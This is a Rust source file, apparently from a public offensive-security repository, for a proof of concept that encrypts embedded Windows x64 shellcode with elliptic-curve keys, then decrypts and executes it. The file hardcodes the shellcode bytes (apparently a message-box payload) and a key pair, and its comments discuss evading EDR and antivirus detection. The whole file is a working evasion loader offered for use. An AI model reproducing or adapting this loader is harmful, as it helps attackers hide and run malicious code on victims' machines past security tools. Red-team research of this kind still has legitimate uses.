-
Notifications
You must be signed in to change notification settings - Fork 56
/
Copy pathmain.rs
121 lines (94 loc) · 5.55 KB
/
main.rs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
/*
Title: Elliptic Curve Cryptography (ECC) Shellcode Encryption and Decryption
Description: This Proof of Concept (POC) demonstrates the encryption of shellcode using a public key and its subsequent decryption using the corresponding private key and R_Point.
Author: Smukx.E [@5mukx]
*/
// core program of shellcode execution
#![allow(deprecated)]
#![allow(unused_imports)]
use std::default;
use decryption::decode_shellcode;
use execute_shellcode::shell_exec;
use generate_keys::{generate_random_keys, reconstruct_keys};
use k256::{elliptic_curve::{sec1::EncodedPoint, AffinePoint}, Secp256k1};
use sha2::digest::generic_array::GenericArray;
pub mod generate_keys;
pub mod encryption;
pub mod decryption;
pub mod execute_shellcode;
use k256::elliptic_curve::sec1::FromEncodedPoint;
pub type GenericKeyGen = GenericArray<u8, sha2::digest::typenum::UInt<sha2::digest::typenum::UInt<sha2::digest::typenum::UInt<sha2::digest::typenum::UInt<sha2::digest::typenum::UInt<sha2::digest::typenum::UInt<sha2::digest::typenum::UTerm, sha2::digest::consts::B1>, sha2::digest::consts::B0>, sha2::digest::consts::B0>, sha2::digest::consts::B0>, sha2::digest::consts::B0>, sha2::digest::consts::B0>>;
// Actual Example Shellcode !
const SHELLCODE: [u8; 328] = [
0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,
0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,
0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,
0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,
0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,
0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,
0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,
0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,
0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,
0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,
0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,
0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,
0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,
0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x3e,
0x48,0x8d,0x8d,0x30,0x01,0x00,0x00,0x41,0xba,0x4c,0x77,0x26,
0x07,0xff,0xd5,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,
0x8d,0x95,0x0e,0x01,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x24,0x01,
0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,
0x48,0x65,0x79,0x20,0x6d,0x61,0x6e,0x2e,0x20,0x49,0x74,0x73,
0x20,0x6d,0x65,0x20,0x53,0x6d,0x75,0x6b,0x78,0x00,0x6b,0x6e,
0x6f,0x63,0x6b,0x2d,0x6b,0x6e,0x6f,0x63,0x6b,0x00,0x75,0x73,
0x65,0x72,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00
];
fn main(){
// => Generate Random Public and Private key and convert them into bytes.
/*
{
let (private, public) = generate_random_keys();
println!("{:?}\n", private);
println!("{:?}\n", public);
}
*/
// => Replace your actual private and public key.
// These are generated from generate_random_keys().
let private = [253, 48, 173, 74, 135, 132, 245, 180, 220, 175, 38, 223, 14, 31, 202, 97, 50, 186, 157, 224, 105, 46, 50, 69, 209, 50, 239, 88, 41, 68, 62, 172];
let public = [4, 144, 27, 74, 69, 101, 105, 125, 38, 105, 206, 96, 151, 196, 111, 194, 141, 115, 153, 205, 128, 163, 134, 252, 25, 177, 33, 221, 87, 78, 213, 165, 128, 109, 210, 80, 20, 251, 117, 194, 54, 71, 104, 98, 22, 179, 56, 31, 200, 162, 45, 26, 138, 172, 110, 73, 16, 179, 187, 174, 11, 208, 46, 100, 68];
// => reconstruct_keys() function helps to reconstruct private and public keys from bytes. (Hardest Part)
let (private_keys, public_keys) = reconstruct_keys(private.into(), Box::new(public));
println!("Reconstruction Check: ");
println!("Decrypt Private key: {:?}",private_keys);
println!("Decrypt Public Key: {:?}", public_keys);
println!();
// => Encrypting Shellcode using public key. we get shellcode+R Point.
let (r_point , encrypted_shellcode) = encryption::encrypt_shellcode(&SHELLCODE, &public_keys);
// i decided to convert the r_point => as byte
let r_point_bytes = r_point.as_bytes();
println!();
println!("Serialized r_point: {:?}", r_point_bytes);
println!();
// => In order to decrypt the shellcode you need two things. R Point and Private Keys ;)
// Good news is that you do need to write to decode bytes to keys since i already wrote and integrated into each function and steps.
// Pass the R Point bytes and you are good to go.
/* => Sample Test i did to check if it rebuils perfectly
let r = EncodedPoint::<Secp256k1>::from_bytes(r_point_bytes)
.expect("Invalid EncodedPoint");
println!("Rebuilt r_point: {:?}", r);
*/
let decrypted_shellcode = decode_shellcode(&encrypted_shellcode, &r_point_bytes, &private_keys);
// Print and execute the shellcode
println!("Decrypted Shellcode: {:?}\n", decrypted_shellcode);
println!("Actual Shellcode: {:?}\n", SHELLCODE);
// Since we are using very simple execution methods to execute the program. it is possible to get detected by EDRS/AV..
// use your own nerdy way to execute the shellcode.
println!("Executing Shellcode: ");
shell_exec(decrypted_shellcode);
}